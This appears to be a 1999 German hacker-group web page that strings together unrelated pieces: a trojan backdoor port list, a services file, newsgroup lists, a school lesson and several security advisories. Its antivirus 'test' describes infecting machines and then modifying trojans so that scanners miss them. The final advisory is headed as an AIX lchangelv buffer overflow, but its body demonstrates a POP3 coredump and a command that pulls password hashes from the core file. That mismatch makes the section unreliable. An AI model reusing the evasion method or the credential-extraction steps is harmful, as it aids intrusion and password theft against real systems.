fxelectronics.de

port 21 – Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
port 23 – Tiny Telnet Server
port 25 – Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy
port 31 – Hackers Paradise
port 80 – Executor
port 456 – Hackers Paradise
port 555 – Ini-Killer, Phase Zero, Stealth Spy
port 666 – Satanz Backdoor
port 1001 – Silencer, WebEx
port 1011 – Doly Trojan
port 1170 – Psyber Stream Server, Voice
port 1234 – Ultors Trojan
port 1245 – VooDoo Doll
port 1492 – FTP99CMP
port 1600 – Shivka-Burka
port 1807 – SpySender
port 1981 – Shockrave
port 1999 – BackDoor
port 2001 – Trojan Cow
port 2023 – Ripper
port 2115 – Bugs
port 2140 – Deep Throat, The Invasor
port 2801 – Phineas Phucker
port 3024 – WinCrash
port 3129 – Masters Paradise
port 3150 – Deep Throat, The Invasor
port 3700 – Portal of Doom
port 4092 – WinCrash
port 4590 – ICQTrojan
port 5000 – Sockets de Troie
port 5001 – Sockets de Troie
port 5321 – Firehotcker
port 5400 – Blade Runner
port 5401 – Blade Runner
port 5402 – Blade Runner
port 5569 – Robo-Hack
port 5742 – WinCrash
port 6670 – DeepThroat
port 6771 – DeepThroat
port 6969 – GateCrasher, Priority
port 7000 – Remote Grab
port 7300 – NetMonitor
port 7301 – NetMonitor
port 7306 – NetMonitor
port 7307 – NetMonitor
port 7308 – NetMonitor
port 7789 – ICKiller
port 9872 – Portal of Doom
port 9873 – Portal of Doom
port 9874 – Portal of Doom
port 9875 – Portal of Doom
port 9989 – iNi-Killer
port 10067 – Portal of Doom
port 10167 – Portal of Doom
port 11000 – Senna Spy
port 11223 – Progenic trojan
port 12223 – Hack´99 KeyLogger
port 12345 – GabanBus, NetBus
port 12346 – GabanBus, NetBus
port 12361 – Whack-a-mole
port 12362 – Whack-a-mole
port 16969 – Priority
port 20001 – Millennium
port 20034 – NetBus 2 Pro
port 21544 – GirlFriend
port 22222 – Prosiak
port 23456 – Evil FTP, Ugly FTP
port 26274 – Delta
port 31337 – Back Orifice
port 31338 – Back Orifice, DeepBO
port 31339 – NetSpy DK
port 31666 – BOWhack
port 33333 – Prosiak
port 34324 – BigGluck, TN
port 40412 – The Spy
port 40421 – Masters Paradise
port 40422 – Masters Paradise
port 40423 – Masters Paradise
port 40426 – Masters Paradise
port 47262 – Delta
port 50505 – Sockets de Troie
port 50766 – Fore
port 53001 – Remote Windows Shutdown
port 61466 – Telecommando
port 65000 – Devil

DareDevil

Fragt mich nicht wo ich das gefunden habe …muss schon länger her sein…aber ich habe es noch …naja villeicht kannst du es irgendwie irgendwo gebrauchen …cya
also In dieser Datei werden die Anschlußnummern von gängigen Diensten
entsprechend RFC 1060 (Assigned Numbers) aufgeführt.

# Format:
#
# / [Aliasnamen…] [#]
#

echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
qotd 17/udp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/tcp nameserver
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp nameserver # name-domain server
domain 53/udp nameserver
nameserver 53/tcp domain # name-domain server
nameserver 53/udp domain
mtp 57/tcp # deprecated
bootp 67/udp # boot program server
tftp 69/udp
rje 77/tcp netrjs
finger 79/tcp
link 87/tcp ttylink
supdup 95/tcp
hostnames 101/tcp hostname # usually from sri-nic
iso-tsap 102/tcp
dictionary 103/tcp webster
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop 109/tcp postoffice
pop2 109/tcp # Post Office
pop3 110/tcp postoffice
portmap 111/tcp
portmap 111/udp
sunrpc 111/tcp
sunrpc 111/udp
auth 113/tcp authentication
sftp 115/tcp
path 117/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/udp ntpd ntp # network time protocol (exp)
nbname 137/udp
nbdatagram 138/udp
nbsession 139/tcp
NeWS 144/tcp news
sgmp 153/udp sgmp
tcprepo 158/tcp repository # PCMAIL
snmp 161/udp snmp
snmp-trap 162/udp snmp
print-srv 170/tcp # network PostScript
vmnet 175/tcp
load 315/udp
vmnet0 400/tcp
sytek 500/udp
biff 512/udp comsat
exec 512/tcp
login 513/tcp
who 513/udp whod
shell 514/tcp cmd # no passwords used
syslog 514/udp
printer 515/tcp spooler # line printer spooler
talk 517/udp
ntalk 518/udp
efs 520/tcp # for LucasFilm
route 520/udp router routed
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
rvd-control 531/udp MIT disk
netnews 532/tcp readnews
netwall 533/udp # -for emergency broadcasts
uucp 540/tcp uucpd # uucp daemon
klogin 543/tcp # Kerberos authenticated rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
garcon 600/tcp
maitrd 601/tcp
busboy 602/tcp
acctmaster 700/udp
acctslave 701/udp
acct 702/udp
acctlogin 703/udp
acctprinter 704/udp
elcsd 704/udp # errlog
acctinfo 705/udp
acctslave2 706/udp
acctdisk 707/udp
kerberos 750/tcp kdc # Kerberos authentication–tcp
kerberos 750/udp kdc # Kerberos authentication–udp
kerberos_master 751/tcp # Kerberos authentication
kerberos_master 751/udp # Kerberos authentication
passwd_server 752/udp # Kerberos passwd server
userreg_server 753/udp # Kerberos userreg server
krb_prop 754/tcp # Kerberos slave propagation
erlogin 888/tcp # Login and environment passing
kpop 1109/tcp # Pop with Kerberos
phone 1167/udp
ingreslock 1524/tcp
maze 1666/udp
nfs 2049/udp # sun nfs
knetd 2053/tcp # Kerberos de-multiplexor
eklogin 2105/tcp # Kerberos encrypted rlogin
rmt 5555/tcp rmtd
mtb 5556/tcp mtbd # mtb backup
man 9535/tcp # remote man server
w 9536/tcp
mantst 9537/tcp # remote man server, testing
bnews 10000/tcp
rscs0 10000/udp
queue 10001/tcp
rscs1 10001/udp
poker 10002/tcp
rscs2 10002/udp
gateway 10003/tcp
rscs3 10003/udp
remp 10004/tcp
rscs4 10004/udp
rscs5 10005/udp
rscs6 10006/udp
rscs7 10007/udp
rscs8 10008/udp
rscs9 10009/udp
rscsa 10010/udp
rscsb 10011/udp
qmaster 10012/tcp
qmaster 10012/udp

————————-

Servicename | Portnummer | Sockel (TCP oder UDP)

DareDevil

Programmiersprachen
de.comp.lang.c 539 Beiträge Schreiben Info
de.comp.lang.forth 98 Beiträge Schreiben Info
de.comp.lang.iso-c++ 271 Beiträge Schreiben Info
de.comp.lang.java 2072 Beiträge Schreiben Info
de.comp.lang.javascript 2046 Beiträge Schreiben Info
de.comp.lang.misc 174 Beiträge Schreiben Info
de.comp.lang.assembler. 2 Gruppen
de.comp.lang.pascal. 2 Gruppen
de.comp.lang.perl. 2 Gruppen
fido.ger.pascal 20 Beiträge Schreiben
maus.computer.sprache.c 100 Beiträge Schreiben
maus.computer.sprache.modula-2 12 Beiträge Schreiben
ms.pub.de.vb 1455 Beiträge Schreiben
ms.pub.de.vc 517 Beiträge Schreiben
z-netz.sprachen.algorithmen 87 Beiträge Schreiben
z-netz.sprachen.allgemein 61 Beiträge Schreiben
z-netz.sprachen.basic 99 Beiträge Schreiben
z-netz.sprachen.c 67 Beiträge Schreiben
z-netz.sprachen.dbase 91 Beiträge Schreiben
z-netz.sprachen.forth 11 Beiträge Schreiben
z-netz.sprachen.modula 16 Beiträge Schreiben
z-netz.sprachen.oberon 14 Beiträge Schreiben
z-netz.sprachen.pascal 91 Beiträge Schreiben
z-netz.sprachen.rexx

Linux
de.alt.comm.mgetty 288 Beiträge Schreiben Info
de.comp.os.unix. 11 Gruppen
de.comp.os.vms 104 Beiträge Schreiben Info
fido.ger.unix 1 Beiträge Schreiben
maus.computer.unix 93 Beiträge Schreiben
z-netz.rechner.unix 46 Beiträge Schreiben
z-netz.alt.rechner.unix.diskussion 8 Beiträge Schreiben
z-netz.alt.rechner.unix.quellen

Sonstiges
de.alt.sci.ergonomie 166 Beiträge Schreiben Info
de.org.ccc 2075 Beiträge Schreiben Info
z-netz.alt.computerclub.auge 38 Beiträge Schreiben
z-netz.alt.listen 92 Beiträge Schreiben
z-netz.rechner.ibm.programmieren 58 Beiträge Schreiben
z-netz.rechner.programmieren

DFÜ
de.comm.isdn.computer 1060 Beiträge Schreiben Info
de.comm.isdn.misc 347 Beiträge Schreiben Info
de.comm.isdn.technik 412 Beiträge Schreiben Info
de.comm.isdn.telefon 615 Beiträge Schreiben Info
de.comm.isdn.tk-anlage 1608 Beiträge Schreiben Info
de.comm.modem 682 Beiträge Schreiben Info
fido.ger.isdn 52 Beiträge Schreiben
fido.ger.modem 26 Beiträge Schreiben
z-netz.alt.modem.usr 98 Beiträge Schreiben
z-netz.alt.modem.zyxel 88 Beiträge Schreiben
z-netz.telecom.btx 66 Beiträge Schreiben
z-netz.telecom.modem.allgemein 68 Beiträge Schreiben

Tips
de.comm.internet.commerce 297 Beiträge Schreiben Info
de.comm.internet.misc 1162 Beiträge Schreiben Info
de.comm.internet.routing 486 Beiträge Schreiben Info
de.etc.lists 76 Beiträge Schreiben Info
de.comp.os.unix.linux.newusers

NewsGroups
de.alt.comm.isdn4linux 1996 Beiträge
de.alt.sources.linux.patches 99 Beiträge
fido.ger.linux 86 Beiträge
ka.comp.linux 99 Beiträge
z-netz.alt.linux 285 Beiträge
de.comp.os.unix.linux.newusers 2168 Beiträge
de.comp.os.unix.linux.hardware 2040 Beiträge
de.comp.os.unix.linux.misc 2164 Beiträge
maus.computer.linux 694 Beiträge
maus.computer.linux.m68k 101 Beiträge
schule.schueler.linux 227 Beiträge

Wir schreiben den 01.06.1999. Es ist Dienstag Vormittag und wir haben Informatik. Wieder so ein langweiliges LOGO Gesülze, denken sich die armen Schüler. Aber zum Erstaunen dieser, ist dem nicht so:

„Heute fangen wir mit dem Thema Internet an.“ sagt der Lehrer. Das Gefüuhl der Langeweile entschwindet gegen das Gefühl: „Boah, cool!“ Man träumt von HTML-„Programmierung“ (StyleSheets wären nicht schlecht) und von den Grundlagen eines supertollen TCP/IP Protokolls. Dem wird wohl nicht so sein (Viele Schüler wissen immerhin ja nicht was ein TCP/IP Protokoll ist, das macht auch nichts). Immerhin wurden uns die grundlegensten Grundlagen der HTML-„Programmierung“ beigebracht. Und uns wurde gesagt, daß wir mal Surfen dürfen (Bekannstmachung meiner Seite wird die Folge sein).

Ich werde mal genau das hierhin schreiben, was uns der heutige Info-Unterricht beigebracht hat:

Internet:

Verbindung zwischen den Netknoten. Ausfallsicherheit durch Dezentalisierung.

Ziele damals:
Austauschen von Foruschungsergebnissen

Rechner mit dem Betriebssystem „UNIX“. (Heute bekannt als LINUX „hä?“)

Im Laufe der Zeit alle Universitäten angeschlossen. Für normale Benutzer genießbar seit Einführung des World Wide Webs und HTML (Hyper Text Markup Language)

Problem: Texte formatieren, auf allen Plattformen anzeigbar

<b> Text soll fett gedruckt werden </b>

Hypertext: Texte mit LINKS (Verweises), so daß beim Anklicken der neue Text angezeigt wird.
Browser: Programm das HTML Dokumente auf dem jeweiligen Rechner darstellt.

<html>
<head>
<title> Erster Versuch </title>
</head>
<body>
<h1> obente Überschrift </h1>

und so weiter! ich denke so ziehmlich jeder wird ein einfaches HTML-„Script“ ergänzen können!
Also ich hoffe, daß diese Sprache näher behandelt wird, und das euch dieser kleine Bericht gefallen hat.

In diesem Sinne,

stevoberg

(c) 1999 Vision Crew Stuttgart

Sicherheitsprobleme mit Samba

Betriebssystem

Windows NT, Windows 95/98
Software

Kernel
Angriffe

Denial-of-Service, falsche Logon-Bildschirme
Schutz

nur teilweise möglich
Stichworte

Denial-of-Service, Spionage, Ermittlung von Usernamen und Paßwörtern
Datum

17.03.1999

Mit der Software Samba kann ein Unix-Rechner in ein NT-Netz integriert werden. Da die von Microsoft implementierten Sicherheitsmechanismen lückenhaft sind, ergeben sich immer wieder Probleme.

Problem
Wird ein Unix-Server mit Samba 1.9.18p5 wie nachstehend konfiguriert (smb.conf), können sich ernste Probleme im NT-Netz ergeben:
security=server
password server=[hostname of PDC]
domain controller=[hostname of PDC]
domain logons=yes
Der Rechner wird in der Domäne zunächst als Windows NT 4.2 Server gemeldet, um sein Erscheinunsgbild nach einigen Stunden in das eines Backup-Domänencontrollers (BDC) zu ändern. Wird der Primary-Domänencontroller (PDC) nun gebootet, bricht der Vorgang mit der irreführenden Meldung ab, daß kein PDC im Netz vorhanden sei. Erst ein Herunterfahren des Samba-Rechners ermöglicht das Hochfahren des PDCs.

Ein weiteres Problem ergibt sich, wenn Windows 95/98-Clients im Netz vorhanden sind. Diese versuchen, sich am „falschen“ BDC anzumelden, was natürlich nicht geht. Es ist jedoch denkbar, mittels eines vom Samba-Server gesendeten getürkten Login-Bildschirms an die Accounts und die dazugehörigen Paßwörter zu gelangen.

Empfehlung
Das erste Problem soll mit der Version 2.0 von Samba gelöst werden, was vor böswilligen Attacken mit der Version 1.9.18p5 natürlich nicht schützt. Microsoft sieht sich nicht in der Lage, das Problem mit einem Hotfix anzugehen und verweist auf Windows 2000.
Für das Problem der sinnlosen Anmeldeversuche am Samba-Server hat Microsoft einige Tips herausgegeben, wie das Problem durch eine geschickte Konfiguration vermieden werden kann.

Information
http://www.ntbugtraq.com/page_archives_wa.asp?A1=ind9903&L=ntbugtraq http://support.microsoft.com/support/kb/articles/q192/0/64.asp http://support.microsoft.com/support/kb/articles/q150/8/00.asp

(c)1999 Vision Crew Stuttgart

Neuer Angriffstyp ermittelt gültige E-mail-Adressen

Betriebssystem

alle Systeme
Software

Mailserver
Angriffe

Ermittlung gültiger E-mail-Adressen
Schutz

–
Stichworte

Spionage, brute-force-Angriff, Wörterbuch
Datum

16.03.1999

Das SMTP-Protokoll sieht vor, daß die Empfängeradresse mittels des Befehls RCPT TO:<Name> dem Server übermittelt wird. Ist der Empfänger unbekannt, wird eine Fehlermeldung zurückgegeben .

Problem
Ein neuer Typ von Spionageprogrammen – genannt „address collector“ – geht auf die Suche nach E-mail-Adressen. Mittels eines Wörterbuchs mit häufig genutzten Namen werden systematisch Adressen gesucht und abgespeichert. Beispiel:
02:24 16:22 SMTPD(00360110) [209.86.182.86] MAIL
FROM:<info@savings.com>
02:24 16:22 SMTPD(00360110) [209.86.182.86] RCPT
TO:<arne@954access.net>
02:24 16:22 SMTPD(00360110) [209.86.182.86] RCPT
TO:<arnie@954access.net>
02:24 16:22 SMTPD(00360110) [209.86.182.86] ERR 954access.net invalid
user <arnie@954access.net
Wird keine Fehlermeldung erzeugt, geht das Angriffsprogramm von der Existenz der Adresse aus.

Empfehlung
Zur Zeit gibt es keinen wirksamen Schutz gegen diesen Angriff, mit dem der Mailserver für Stunden beschäftigt werden kann. Ist die (natürlich) gespoofte Absenderadresse bekannt (info@savings.com in unserem Beispiel), können diese Adressen für die weitere Kommunikation ausgeschlossen werden. Besser wäre es, wenn der Mailserver nach mehreren Fehlermeldungen die Verbindung abbricht. Die Programmierer von Mailservern sollten dieses Feature in ihre nächsten Versionen einbauen.

Information
http://www.netspace.org/cgi-bin/wa?A1=ind9903a&L=bugtraq#13
http://www.l8r.com/nwa/nwa1.htm

(c) 1999 Vision Crew Stuttgart

Betriebssystem

Unix
Software

Unix Webserver mit installiertem HTML-Script Version 2.99x und kleiner
Angriffe

Lesen von Dateien
Stichworte

fremde Berechtigungen, cgi-Skripte, Webserver
Datum

20.02.1999

Die kommerzielle Software HTML-Script ist ein Tool zur vereinfachten Zugriffesverwaltung vom Internet auf die eigenen www-Seiten.

Problem
Durch einen Fehler im Parser für die cgi-Scripte können auf allen Rechnern mit installiertem HTML-Script beliebige Dateien gelesen werden.

Empfehlung
Ein Workaround ist nicht verfügbar. Als Patch kann das Upgrade auf HTML-Script 2.9932 oder 3.x/Miva 1.x: durchgeführt werden

Information
http://www.htmlscript.com

Vision Crew Aktuell
(c) 1999 by SkyHawkeVC
Dieser Test wurde am 29.05.1999 von 10-12 Uhr durchgeführt

Maillist-Nr.: 3

*** Vision Crew Stuttgart deckt großen Schwindel auf ! ***

Knapp 300 Mark kostet das neue Antivirus Programm AVP mit Datum vom 15.05.1999 von Kaspersky. Wir waren doch gleich begeistert und haben uns tatsächlich dazu entschlossen gleich zwei Exemplare davon zu kaufen, schließlich wurde in der Werbung auch angegeben das jeder Trojaner erkannt und entfernt wird und welcher Hacker hat schon gerne einen Trojaner auf seinen eigenen Rechner außer die Client Version 😉

Nun sind wir doch mal gespannt, schließlich hängt unsere Zukunft von dem nicht Funktionieren der Software ab, also ab zum testen. Wir haben dafür drei gleich Konfigurierte Systeme mit Windofff 98 benutzt und diese mit Absicht infiziert. Dabei sind die drei bekanntesten Trojaner benutzt worden, zum einen Bo und Netbus aber auch der schon bekannte Girlfrend.

Kaum waren die Rechner Verseucht, schlug auch schon AVP Alarm und meldete Trojaner an. Mit tränen in den Augen und schon Gedanken vielleicht doch ein anderes Hobby zu suchen, haben wir auf allen Rechnern das Desinfektions Button angeklickt. Doch das was nun kam hinterließ ein lächeln im Gesicht, den mit Desinfektion oder löschen der Infizierten Datei war dann doch nichts, im Gegenteil an einem Rechner ist sogar der AVP ganz abgestürzt und brachte gar keine Meldungen mehr.

Na was war das den ? Insgesamt 600 DM für Software ausgegeben uns die stürzt ab ? Nun ja es gibt ja den Support für Leute die so einen Schwachsinn auch noch kaufen. Leider gehören wir mittlerweile auch dazu ;-(

Was soll man sagen, hat jemals etwas beim Support Funktioniert ? Neeee und bei AVP schon garnicht.

Wir haben die Rechner nach dieser Niederlage und 600 DM weniger in der Tasche dann doch Manuell von den Trojanern befreien müssen. Jedoch waren wir immer noch darüber beunruhigt das jeder Nutzer von AVP über den Trojaner Informiert wird, mit ein paar Kenntnissen sind diese ja leicht zu entfernen. Also das ganze noch einmal, diesmal haben wir aber jeden Trojaner Modifiziert und den Dateinamen geändert. Wie erwartet hat AVP den NetBus und Gilfrend nicht erkannt, jedoch bei Bo schlug er wieder Alarm. So eine Schande aber auch, war doch BO der Liebling der Vision Crew. Nun was uns nicht gleich aufgefallen ist, das AVP den BO client als Trojaner entlarvte ??????? Nun ja das mag ja wohl sein, das BOClient und BoServer aus dem gleichen Stall sind aber BOClient ein Trojaner, nun gut der BoClient wurde von uns entfernt und das System nochmals Gestartet und wolla keine Meldungen mehr über einen Trojaner und das auf allen drei Systemen.

Tja zum Schluß können wir da nur sagen: AVP ist sein Geld nicht wert und wer dennoch nicht darauf verzichten möchte, sollte den Gang ins Internet lieber meiden., schnell ist ein Trojaner dein bester Freund und du merkst es nicht mal weil dein AVP absolute scheiße ist.

Hallo ihr Hacker!

Ich möchte nun ein wenig über Elite Sprache oder auch 31337 Speech berichten! Aller Anfang ist schwer und so hatte ich am Anfang Probleme, überhaupt rauszukriegen, was die ganzen Hacker mit 31337 meinen. (Ich stellte mir was überaus kompliziertes vor!)

Also, unter 31337-speech versteht man nichts anderes, als Buchstaben durch ähnlich andere Zeichen, meist Ziffern, zu ersetzen. Beispielsweise der Satz:

Hallo allezusammen, ich hoffe das Magazin wird toll!

würde wie folgt aussehen:

h4110 4113zu54mm3n, 1ch h0ff3 d45 m4g4z1n w1rd t011!

Aber unter dem Begriff 31337 versteht man noch anderes. Wen man sich zu den 31337 Hackern zäht, dann ist man in jeder Hinsicht des Hacken’s auch ELITE! Also man kann am besten alles!

Viele Docs sagen nun, wenn man sich nun unbedingt in Einschlägigen IRC-Channels (Chaträumen) aufhalten will, sollte man ausschließlich seine Kommentare in Form von 31337 speech abgeben. Es kursieren viele interessante Ideen, Buchstaben durch andere Zeichen zu ersetzen, z.B.: ein „K“ symbolisieren viele mit „|<“ wobei das ganze jetzt in Times New Roman ziehmlich scheisse aussieht. Im Text-basierten Chat sieht das dann besser aus.

Also, meine Frage:
Was haltet ihr von dieser „31337 speech“? Schreibt ein Posting ins Forum!

Tschüss,
stevoberg

Informationsquelle: Vision Crew Stuttgart
(c) 1999 by MerLinVC

Pufferüberlauf in lchangelv
Betriebssystem Unix/ AIX 4.1, 4.2
Software /usr/sbin/lchangelv
Angriffe Start von Programmen mit root-Berechtigung
Stichworte Pufferüberlauf, root-Berechtigung
Datum 15.09.1998

Das Programm lchangelv ist Bestandteil des Logical Volume Managers und dient der Modifikation eines Logical Volumes. Das Programm läuft mit gesetztem setuid-Bit und wird inNormalfall vom smit aus gestartet. (mac)

Problem
Bei einem Anmeldeversuch mit unbekanntem User über Telnet direkt an den beiden Ports stürzen die Programme mit einem Coredump ab. In der Datei /core, die für Jedermann lesbar ist, stehen diverse Paßwörter verschlüsselt oder im lartext.;)] Jeder User mit lokalem Account kann Paßwörter direkt auslesen bzw. in den Besitz von Shadow-Paßwörtern gelangen und diese ggf. mit einem Paßwortcracker entschlüsseln.

——————————————————————————–

Empfehlung
Als Workaround sollten die beiden Dämonen deaktiviert werden. Patches sind nicht verfügbar.

——————————————————————————–

Information
Folgendes Beispiel demonstriert den Bug

[root@koek] /# telnet zopie 110
Trying 10.10.13.1…
Connected to zopie.attic.vuurwerk.nl.
Escape character is ‚^]‘.
+OK zopie.attic.vuurwerk.nl POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[i have no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.
At this point ipop3d coredumps in /core:

[root@zopie] /# strings core | grep -A3 root
root

[crypted pw here]
10244

Sun Feb 1 23:45:15 1998